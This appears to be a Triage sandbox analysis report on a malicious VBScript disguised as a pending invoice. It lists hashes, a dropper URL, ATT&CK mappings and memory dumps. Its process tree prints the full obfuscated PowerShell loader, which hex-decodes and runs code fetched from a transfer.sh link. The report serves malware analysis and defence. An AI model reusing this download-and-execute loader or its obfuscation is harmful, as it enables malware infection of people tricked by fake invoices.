8aeb965677a1c620341bb314a7c4c59d2692f572fb1f79de81fceee647d2c0bd | Triage

Analysis

max time kernel
0s
max time network
120s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
05-01-2024 21:44

Sharing

Report Analysis Logs

General

Target

Pending_invoice#YT.vbs
Size

1KB
MD5

8414a4e55d98be8c6db2a6402dc5dcf7
SHA1

e7b0029f57d414c59fac378cd8d96277195b0bc3
SHA256

766d8e9d2d0de0a0ba2440a847e7eb7da3e69d51331e15a61ec1d25d3d92fc3e
SHA512

5a5f4cc80581b2d6c0bc6b20e24bc12b224e6c995cb5b701fdbf0a0aa3430fa22a955d43f7c6fe6707ef3ea91b87fbaabd4e816b4953aa18db29a554ec2c863d

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://transfer.sh/1fxtG6x/bypassbook.txt

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pending_invoice#YT.vbs"
1⤵
PID:2356
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $TRUMP ='https://transfer.sh/1fxtG6x/bypassbook.txt';$SOS='24-42-20-3d-27-45-54-48-20-43-4f-49-4e-74-2e-57-54-46-20-43-4f-49-4e-6c-49-4f-53-4e-54-27-2e-52-65-70-6c-61-63-65-28-27-45-54-48-20-43-4f-49-4e-27-2c-27-6e-45-27-29-2e-52-65-70-6c-61-63-65-28-27-54-46-20-43-4f-49-4e-27-2c-27-45-62-43-27-29-2e-52-65-70-6c-61-63-65-28-27-4f-53-27-2c-27-65-27-29-3b-24-43-43-20-3d-20-27-44-4f-53-20-43-4f-49-4e-20-4c-53-4f-53-43-4f-49-4e-6e-47-27-2e-52-65-70-6c-61-63-65-28-27-53-20-43-4f-49-4e-20-27-2c-27-57-6e-27-29-2e-52-65-70-6c-61-63-65-28-27-53-4f-27-2c-27-6f-61-44-27-29-2e-52-65-70-6c-61-63-65-28-27-43-4f-49-4e-27-2c-27-54-72-49-27-29-3b-24-41-20-3d-27-49-60-45-6f-73-20-43-4f-49-4e-60-57-60-42-54-43-20-43-4f-49-4e-6a-60-45-54-48-20-43-4f-49-4e-20-24-42-29-2e-24-43-43-28-24-54-52-55-4d-50-29-27-2e-52-65-70-6c-61-63-65-28-27-6f-73-20-43-4f-49-4e-27-2c-27-58-28-6e-60-65-27-29-2e-52-65-70-6c-61-63-65-28-27-42-54-43-20-43-4f-49-4e-27-2c-27-2d-4f-62-27-29-2e-52-65-70-6c-61-63-65-28-27-54-48-20-43-4f-49-4e-27-2c-27-60-63-60-54-27-29-3b-26-28-27-49-27-2b-27-45-58-27-29-28-24-41-20-2d-4a-6f-69-6e-20-27-27-29-7c-26-28-27-49-27-2b-27-45-58-27-29-3b';Invoke-Expression (-join ($SOS -split '-' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))
  2⤵
  PID:2076

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2076-4-0x000000001B690000-0x000000001B972000-memory.dmp

Filesize
2.9MB

Download
memory/2076-6-0x000007FEF58B0000-0x000007FEF624D000-memory.dmp

Filesize
9.6MB

Download
memory/2076-7-0x0000000002B30000-0x0000000002BB0000-memory.dmp

Filesize
512KB

Download
memory/2076-5-0x0000000001D00000-0x0000000001D08000-memory.dmp

Filesize
32KB

Download
memory/2076-9-0x0000000002B30000-0x0000000002BB0000-memory.dmp

Filesize
512KB

Download
memory/2076-10-0x0000000002B30000-0x0000000002BB0000-memory.dmp

Filesize
512KB

Download
memory/2076-11-0x000007FEF58B0000-0x000007FEF624D000-memory.dmp

Filesize
9.6MB

Download
memory/2076-8-0x000007FEF58B0000-0x000007FEF624D000-memory.dmp

Filesize
9.6MB

Download